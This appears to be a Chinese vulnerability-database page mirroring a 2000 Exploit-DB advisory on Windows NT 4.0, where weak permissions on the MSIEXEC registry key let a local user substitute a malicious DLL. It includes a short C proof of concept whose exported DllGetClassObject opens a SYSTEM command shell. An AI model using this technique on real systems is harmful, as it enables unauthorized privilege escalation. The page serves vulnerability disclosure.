Microsoft Windows NT 4.0 – MSIEXEC Registry Permissions

Microsoft Windows NT 4.0 – MSIEXEC Registry Permissions

漏洞ID 1053469 漏洞类型
发布时间 2000-10-23 更新时间 2000-10-23
图片[1]-Microsoft Windows NT 4.0 – MSIEXEC Registry Permissions-安全小百科CVE编号 N/A
图片[2]-Microsoft Windows NT 4.0 – MSIEXEC Registry Permissions-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/20317
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/1835/info

Due to weak permission settings for the registry key that handles the Microsoft Installer Service (MSIEXEC), it is possible for a local user on Windows NT to escalate their privilege level. 

The file extension associated with the Microsoft Installer Service is *.msi. Once a *.msi file is executed, the DLL specified under the following registry key is read:

HKLMSoftwareClassesCLSID{000C103E-0000-0000-C000-000000000046}InProcServer32

By default, it is C:winntsystem32msi.dll. Any user who is able to log on locally to the system may modify the value of the registry key. A malicious user can gain full control over the system if they were to create their own DLL that exports the function DllGetClassObject() and point the registry key to the specially formed DLL rather than msi.dll.

The following code inserted into a DLL will provide Interactive command shell with SYSTEM privileges when a user executes a MSI file:

#include <stdio.h>

__declspec(dllexport)int DllGetClassObject()
{
system("cmd.exe");
return 0;
}

相关推荐: Inter Net News server (inn) Buffer Overflow Vulnerability

Inter Net News server (inn) Buffer Overflow Vulnerability 漏洞ID 1104519 漏洞类型 Boundary Condition Error 发布时间 1999-11-24 更新时间 1999-11-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享